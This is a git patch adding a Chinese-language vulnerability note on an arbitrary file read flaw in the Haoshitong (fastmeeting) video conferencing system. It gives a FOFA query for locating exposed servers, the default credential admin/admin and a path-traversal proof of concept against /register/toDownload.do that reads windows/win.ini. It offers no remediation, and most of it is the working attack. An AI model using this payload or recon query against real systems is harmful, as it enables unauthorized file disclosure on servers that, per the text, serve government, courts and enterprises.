From aaa6091e845d2608dc171db665e6ac56141ef01f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 24 Nov 2023 19:42:35 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=A5=BD=E8=A7=86=E9=80=9A=E8=A7=86?=
 =?UTF-8?q?=E9=A2=91=E4=BC=9A=E8=AE=AE=E7=B3=BB=E7=BB=9F=20toDownload.do?=
 =?UTF-8?q?=E6=8E=A5=E5=8F=A3=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��会议系统 toDownload.do接口 任意文件读取漏洞.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md

diff --git a/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md b/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md
new file mode 100644
index 0000000..48027c3
--- /dev/null
+++ b/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md	
@@ -0,0 +1,18 @@
+## 好视通视频会议系统 toDownload.do接口任意文件读取漏洞
+好视通 是国内云视频会议知名品牌，拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ，专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍历漏洞，可通过fileName参数读取任意文件。 
+
+弱口令admin/admin
+
+## fofa
+```
+"深圳银澎云计算有限公司"
+```
+
+## poc
+```
+/register/toDownload.do?fileName=敏感文件路径
+https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
+
+```
+
+